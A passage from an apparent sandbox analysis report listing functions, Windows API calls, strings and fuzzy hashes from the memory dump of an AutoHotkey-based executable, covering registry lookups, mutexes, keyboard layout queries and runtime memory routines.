WideCharToMultiByte.KERNEL32(00000000,00000400,00000000,?,00000000,00000000,00000001,00000000,00000000,004D4D08,?,?,00000000,00000001,?,0040446A), ref: 0047BBA6

Strings

jD@, xrefs: 0047BB02, 0047BB64
?, xrefs: 0047BB09

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: ByteCharMultiWide$_free
String ID: ?$jD@
API String ID: 4292660327-1837786436
Opcode ID: eb9c6d8c76140b33a0100bceb1b8081a4ca451bac35876cc51d17b54c65d34b2
Instruction ID: f7105da08ef71a43e09ac18bea7285e09b47c54e68cc0c3dc0a46bd0e6cf4348
Opcode Fuzzy Hash: eb9c6d8c76140b33a0100bceb1b8081a4ca451bac35876cc51d17b54c65d34b2
Instruction Fuzzy Hash: 2031D1B22056016FE311CA18CC80B63F7A8EB85724F24C25AEA189BB81D778FC04C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 004453A0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 95registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\AutoHotkey,00000000,00000000,?,?,00000000,?), ref: 004453CF
RegQueryValueExW.ADVAPI32 ref: 00445400
RegCloseKey.ADVAPI32(00000000), ref: 00445409

Strings

InstallDir, xrefs: 004453F2
SOFTWARE\AutoHotkey, xrefs: 004453C5

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: InstallDir$SOFTWARE\AutoHotkey
API String ID: 3677997916-1488329376
Opcode ID: 90013a8b7b8eef32f07539a32183aeadf596a69e374ffbc1bb66725648916636
Instruction ID: c52b7c9e61a9c6685ebd2c548a93e3e3eeb0ecf854934458ed7ce4842565902e
Opcode Fuzzy Hash: 90013a8b7b8eef32f07539a32183aeadf596a69e374ffbc1bb66725648916636
Instruction Fuzzy Hash: 32312C31648B119BEF24CF38C84176BB7E4AF94340F50092EE986D7251E778D985839F

Uniqueness

Uniqueness Score: -1.00%

Function 00408DD7, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 92COMMON

Download Yara Rule

Strings

-_.!~*()/, xrefs: 00408E64
%%%02X, xrefs: 00408E8D
file:///, xrefs: 00408E41
-_.!~*'()/\, xrefs: 00408E04

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID:
String ID: %%%02X$-_.!~*'()/\$-_.!~*()/$file:///
API String ID: 0-1887247624
Opcode ID: d7dcb738a6a8a3ced9b127c2565aba6bc74a8da7130ba70a60f7f452bcf7e920
Instruction ID: b82a2fe1941b49c7dde1b640a1d40a35b9cc7ffd6a260df0bfa491fe3d580ca5
Opcode Fuzzy Hash: d7dcb738a6a8a3ced9b127c2565aba6bc74a8da7130ba70a60f7f452bcf7e920
Instruction Fuzzy Hash: A3212C716047029BEB109B69CD81A2B77E8DF61368B20047FE4C1F62D2EE7CAD41868D

Uniqueness

Uniqueness Score: -1.00%

Function 00418920, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,KbdLayerDescriptor), ref: 004189A2
GetCurrentProcess.KERNEL32(?), ref: 004189BE
IsWow64Process.KERNEL32(00000000), ref: 004189C5
FreeLibrary.KERNEL32(00000000), ref: 004189EB

Strings

KbdLayerDescriptor, xrefs: 0041899C

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Process$AddressCurrentFreeLibraryProcWow64
String ID: KbdLayerDescriptor
API String ID: 2487901806-1890577838
Opcode ID: 068270f96c550aa55075673d316c523fcfe2bc51c8e1afd6c773a222be115550
Instruction ID: fffa646bfb67dadd6636eeccafb41fad9866b61e50112d0ecba64a0c800a58e3
Opcode Fuzzy Hash: 068270f96c550aa55075673d316c523fcfe2bc51c8e1afd6c773a222be115550
Instruction Fuzzy Hash: ED21B3F23252159BD7284F15AC847BB77A4EB44755F25063FE88282260EF3D98908A9E

Uniqueness

Uniqueness Score: -1.00%

Function 004822D0, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00482319

Strings

variable, xrefs: 00482344
The following %s name contains an illegal character:"%-1.300s", xrefs: 00482355
_$#@, xrefs: 00482314
function, xrefs: 0048234B, 00482354

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: _wcschr
String ID: The following %s name contains an illegal character:"%-1.300s"$_$#@$function$variable
API String ID: 2691759472-3792156013
Opcode ID: 0dde0dd1c6653fe62794a84b6b302f83689ae71e5b5085a34c11b014f0bbf7ad
Instruction ID: 7a0b204ff2f2492707157217a3294892b658917644f4e6f52e0bec01070f59b0
Opcode Fuzzy Hash: 0dde0dd1c6653fe62794a84b6b302f83689ae71e5b5085a34c11b014f0bbf7ad
Instruction Fuzzy Hash: 2411CE76F0021013DB20B52AAD46BAB7398D785366F544A7BFD18D63C0E6BD9C0082EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418EA0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00418EE1
_wcstoul.LIBCMT ref: 00418EF8
__wcsnicmp.LIBCMT ref: 00418F0B
_wcstoul.LIBCMT ref: 00418F26

Strings

IA, xrefs: 00418EA1

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsnicmp_wcstoul
String ID: IA
API String ID: 372159744-3293647318
Opcode ID: bd694be417c4a54555388a28546bd61bd8fe8ef3d4e8a669304ab4cf98e3f0bc
Instruction ID: ad63c2ad188a6c0d831c5c3791b1550eb83df2bdb5614f62b2f2a66cbcae2d6e
Opcode Fuzzy Hash: bd694be417c4a54555388a28546bd61bd8fe8ef3d4e8a669304ab4cf98e3f0bc
Instruction Fuzzy Hash: 0B115C3254534526DA00EB699C02FDB739D5F5031CF04405FF44897342EB69894A83BE

Uniqueness

Uniqueness Score: -1.00%

Function 00483760, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32,IsHungAppWindow,?,004826DD), ref: 00483786
GetProcAddress.KERNEL32(00000000), ref: 0048378D

Strings

user32, xrefs: 00483781
IsHungAppWindow, xrefs: 0048377C

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsHungAppWindow$user32
API String ID: 1646373207-934392274
Opcode ID: 795cd91dc195775d82411fe77c32e7cd323e7290510915b70aa04e7fb4fa1d33
Instruction ID: 1293e68a9529228a514472484dce82f98394c78b1ddbaf690c340d7a7571d08a
Opcode Fuzzy Hash: 795cd91dc195775d82411fe77c32e7cd323e7290510915b70aa04e7fb4fa1d33
Instruction Fuzzy Hash: 46F090B17923127AE7616F74AC4BF9A3BD85B02F13F24453AF802D61D0DA58C940561C

Uniqueness

Uniqueness Score: -1.00%

Function 00498C86, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00498CA0

Part of subcall function 0049853E: __FF_MSGBANNER.LIBCMT ref: 00498557
Part of subcall function 0049853E: __NMSG_WRITE.LIBCMT ref: 0049855E
Part of subcall function 0049853E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0049E811,004011D4,00000001,004011D4,?,0049D07D,00000018,004CE9B0,0000000C,0049D10D), ref: 00498583

std::exception::exception.LIBCMT ref: 00498CD5
std::exception::exception.LIBCMT ref: 00498CEF
__CxxThrowException@8.LIBCMT ref: 00498D00

Strings

4TM, xrefs: 00498CB3

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: 4TM
API String ID: 615853336-177811747
Opcode ID: ed1033d455f44b390908fa8c898700dc9606aa3b7fcd0ccf86abbf668772702d
Instruction ID: 479712ce07beaedb5e459a974d28d2dc8af8c588cfcc69bf6c7bb8341148944b
Opcode Fuzzy Hash: ed1033d455f44b390908fa8c898700dc9606aa3b7fcd0ccf86abbf668772702d
Instruction Fuzzy Hash: 3CF0F9315012056ACF00EB5ADC45B9E3FA8AB42718F50007FF404A6192DFBD8A41879E

Uniqueness

Uniqueness Score: -1.00%

Function 00404E50, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000002,?,00404E1A,?,00000000,?,?,00419D4E,004AE8F8,00462BDC,?,00000001,?), ref: 00404E61
GlobalLock.KERNEL32 ref: 00404E86
GlobalFree.KERNEL32 ref: 00404E97

Strings

GlobalLock, xrefs: 00404EA2
GlobalAlloc, xrefs: 00404E73

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Global$AllocFreeLock
String ID: GlobalAlloc$GlobalLock
API String ID: 1811133220-3672399903
Opcode ID: f8f062cccd8f35f0057cb024524deb5b72c4e59ba6af8e9ea768d2543c79be6b
Instruction ID: d689b94d719f8bdea4555fa0dbb6ceb6d595bba251221eaa6683819c5c44c6c7
Opcode Fuzzy Hash: f8f062cccd8f35f0057cb024524deb5b72c4e59ba6af8e9ea768d2543c79be6b
Instruction Fuzzy Hash: 9AF08170A00B025ACB109F76C955A2777E8AFD5701300887FA656C3780EF78D800CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37synchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,03215110,?,004142A1), ref: 0040E0F3
CreateMutexW.KERNEL32(00000000,00000000,AHK Keybd,?,03215110,?,004142A1), ref: 0040E0FE
GetLastError.KERNEL32 ref: 0040E106
CloseHandle.KERNEL32(00000000), ref: 0040E131

Strings

AHK Keybd, xrefs: 0040E0F5

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: CloseHandle$CreateErrorLastMutex
String ID: AHK Keybd
API String ID: 2372642624-4057427925
Opcode ID: abbb98135eb446770aa7c62c1b54cfa658d1deed5df644ec86217d024136cc7f
Instruction ID: 72f4a263067a2aea77808aa17398770139b22550ab5857d119d722dd1f61f733
Opcode Fuzzy Hash: abbb98135eb446770aa7c62c1b54cfa658d1deed5df644ec86217d024136cc7f
Instruction Fuzzy Hash: 6AF0A07370532057D7706BB9ED88B5E6B94AB89BA1F05043BE604EB2D4DB788C5086AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040E150, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37synchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,03215110,?,004142AE), ref: 0040E163
CreateMutexW.KERNEL32(00000000,00000000,AHK Mouse,?,03215110,?,004142AE), ref: 0040E16E
GetLastError.KERNEL32 ref: 0040E176
CloseHandle.KERNEL32(00000000), ref: 0040E1A1

Strings

AHK Mouse, xrefs: 0040E165

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: CloseHandle$CreateErrorLastMutex
String ID: AHK Mouse
API String ID: 2372642624-1022267635
Opcode ID: 3ea4fb69d1198cdbf2dc32b39e50c643c98e8d832323ec76baffad9f7458b8f6
Instruction ID: bcb5ebbef579d0f8be566d27e679fbe8909eebe992779bd368febf2daef229fa
Opcode Fuzzy Hash: 3ea4fb69d1198cdbf2dc32b39e50c643c98e8d832323ec76baffad9f7458b8f6
Instruction Fuzzy Hash: 82F0A77370632057D7205B79ED88B5B7B949B89B61F050437E604DB2D4D7788C40856C

Uniqueness

Uniqueness Score: -1.00%

Function 00418810, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00418823
GetGUIThreadInfo.USER32 ref: 00418835
GetWindowThreadProcessId.USER32(?,00000000), ref: 0041884A
GetKeyboardLayout.USER32(00000000), ref: 0041884F

Strings

0, xrefs: 0041882D

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Thread$ProcessWindow$InfoKeyboardLayout
String ID: 0
API String ID: 3571156007-4108050209
Opcode ID: f358fff0fcc48c3c7098377757b72d70aacd78410a562b37344f5b4647ea0863
Instruction ID: 7855e4d88989149285414f13669d4c70bf934557d294c348f2aef7a61cdfd528
Opcode Fuzzy Hash: f358fff0fcc48c3c7098377757b72d70aacd78410a562b37344f5b4647ea0863
Instruction Fuzzy Hash: A8E03072A0522166D720AA659C44BD77EDCAF826A0F49052AF804D2150EB64D84486B5

Uniqueness

Uniqueness Score: -1.00%

Function 00451F90, Relevance: 7.7, APIs: 5, Instructions: 165COMMON

Download Yara Rule

APIs

__wcsdup.LIBCMT ref: 00451FD9
_malloc.LIBCMT ref: 00451FFB

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsdup_malloc
String ID:
API String ID: 2398682791-0
Opcode ID: 3874594f8420866eb159d191d27a73f456fb36e33675afc9d9c312056ec4fc37
Instruction ID: 11c7438bef7705f540df72593c02ecf38975bcc96c5426fe71107c2a83e8bbec
Opcode Fuzzy Hash: 3874594f8420866eb159d191d27a73f456fb36e33675afc9d9c312056ec4fc37
Instruction Fuzzy Hash: 6B5137B26017058FC720DF6AE98052BB3E0FB86315F148A3FE94187342E776E949CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00482B80, Relevance: 7.6, APIs: 5, Instructions: 143windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,0040EC6F,004D6340,004AE8F8,00000000,00000000,00000000,00000000), ref: 00482BC1
IsWindowVisible.USER32(00000000), ref: 00482BD6

Part of subcall function 00483940: __wcsnicmp.LIBCMT ref: 00483A04
Part of subcall function 00483940: __wcstoui64.LIBCMT ref: 00483A83

IsWindow.USER32(004AE8F8), ref: 00482CDA

Part of subcall function 00483850: IsWindowVisible.USER32(004AE8F8), ref: 00483851

GetWindowLongW.USER32(004AE8F8,000000F0), ref: 00482D06
EnumWindows.USER32(00482E10,00000002), ref: 00482D58

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Window$Visible$EnumForegroundLongWindows__wcsnicmp__wcstoui64
String ID:
API String ID: 256079111-0
Opcode ID: f3b9a0b7b5d2c8ee45e20b1765c0f37221216ed4516bbe8dba47ec8d8ea52129
Instruction ID: b93b636b4e766f8b3b5bc19647e84f6ea19afb5d917e1516ecdaa450b0b87b16
Opcode Fuzzy Hash: f3b9a0b7b5d2c8ee45e20b1765c0f37221216ed4516bbe8dba47ec8d8ea52129
Instruction Fuzzy Hash: D851B2719483C18AC730BF6989845EFBBE4FB85300F448D2FE58887340EBB99944C79A

Uniqueness

Uniqueness Score: -1.00%

Function 0044B4A0, Relevance: 7.6, APIs: 5, Instructions: 83COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?), ref: 0044B4BC
SetLastError.KERNEL32(000000B7), ref: 0044B4CE
_wcsrchr.LIBCMT ref: 0044B4E7
CreateDirectoryW.KERNEL32(?,00000000), ref: 0044B550
SetLastError.KERNEL32(00000057), ref: 0044B565

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: ErrorLast$AttributesCreateDirectoryFile_wcsrchr
String ID:
API String ID: 1861573484-0
Opcode ID: bdb0c406ee900fcd84ff69b3470d8c89cf65ccf86abc9e4f899f06343e73db69
Instruction ID: 678d90427f7aa9acf39165a73fda21c2994097336520fbd7e932394ccaa9dc3d
Opcode Fuzzy Hash: bdb0c406ee900fcd84ff69b3470d8c89cf65ccf86abc9e4f899f06343e73db69
Instruction Fuzzy Hash: 90212832A00314B7EB206F68EC857DBF7A4EB41369F04852BE919972D1E738C945CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00498617, Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00498625

Part of subcall function 0049853E: __FF_MSGBANNER.LIBCMT ref: 00498557
Part of subcall function 0049853E: __NMSG_WRITE.LIBCMT ref: 0049855E
Part of subcall function 0049853E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0049E811,004011D4,00000001,004011D4,?,0049D07D,00000018,004CE9B0,0000000C,0049D10D), ref: 00498583

_free.LIBCMT ref: 00498638

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 7edc2d8a2279daaed0db8c630d3bd46703ffbb4dc92e9ff07dbe915e6df890cf
Instruction ID: 4e531a521c81faca9e026f65512bfffe1a86feafb20cb0cb8e811f9219294702
Opcode Fuzzy Hash: 7edc2d8a2279daaed0db8c630d3bd46703ffbb4dc92e9ff07dbe915e6df890cf
Instruction Fuzzy Hash: 1711A372505615ABCF212F7EAD44A5E3F94AB827A4B21413FF889DF291DE3C8C40869D

Uniqueness

Uniqueness Score: -1.00%

Function 0049C239, Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0049C245

Part of subcall function 0049C462: __getptd_noexit.LIBCMT ref: 0049C465
Part of subcall function 0049C462: __amsg_exit.LIBCMT ref: 0049C472

__getptd.LIBCMT ref: 0049C25C
__amsg_exit.LIBCMT ref: 0049C26A
__lock.LIBCMT ref: 0049C27A
__updatetlocinfoEx_nolock.LIBCMT ref: 0049C28E

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 1b1cae0fde3120a3a115fae107ab030fa5503e6f6e4e348cce3dbe703e28eee8
Instruction ID: deb29876bc525ace51904fcb4b3612afc1cfc9ed84744f8b11138953fe40d787
Opcode Fuzzy Hash: 1b1cae0fde3120a3a115fae107ab030fa5503e6f6e4e348cce3dbe703e28eee8
Instruction Fuzzy Hash: 94F09632D41710ABDE21B7B95987B593F906F01B28F11427FF044A72D2CF6C69418A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00440B50, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 278windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0044D1B0: GetForegroundWindow.USER32(?,?,0043FD55,?), ref: 0044D1DE
Part of subcall function 0044D1B0: IsWindowVisible.USER32(00000000), ref: 0044D1F9

SendMessageTimeoutW.USER32 ref: 00440CC2

Strings

$%K, xrefs: 00440E24
